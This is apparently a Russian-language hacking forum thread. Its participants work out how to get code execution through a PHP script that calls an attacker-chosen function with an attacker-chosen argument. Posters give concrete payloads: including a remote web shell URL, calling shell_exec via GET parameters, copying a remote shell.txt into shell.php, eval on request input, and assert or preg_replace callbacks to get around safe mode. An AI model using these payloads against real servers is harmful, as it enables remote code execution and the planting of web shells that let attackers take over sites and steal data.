взлом 1 функцией
 

точнее взлом с помощью 2 переменных)
возможно ли?)

соответственно $a и $b можно подставить свои

system,exec не катят)

readfile работает,но толку от чтения файлов нет)

$a=include
$b='http://oneline.ucoz.ru/madshell.php'

Это не функция, а языковая конструкция
ps: вопрос весьма интересный, перерываю php.net :)

UPD:
первая идея. Ограничения: должен быть установлен коннект к базе и у пользователя бд должны быть File priv
Функция - mysql_query, параметр

?a=shell_exec&b=you command
шелл, но без вывода.

copy("http://xaker.ru/shell.txt", "shell.php");
eval($_GET[id]);

вариантов масса

eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее

благодаря

выяснилось что на серве safe mode - ON )

потому все "вкусные" функции не пашут)

А так ?


site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]

не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)

Ты хоть пробовал?
ubuntu LAMP
В том и фишка, если бы все было так просто) ...

уже давно пора забить на всякие *exec - туфта все

assert и все дела ) это если один аргумент $b, если можно два - то ченить с коллбеком, если три - то preg_replace.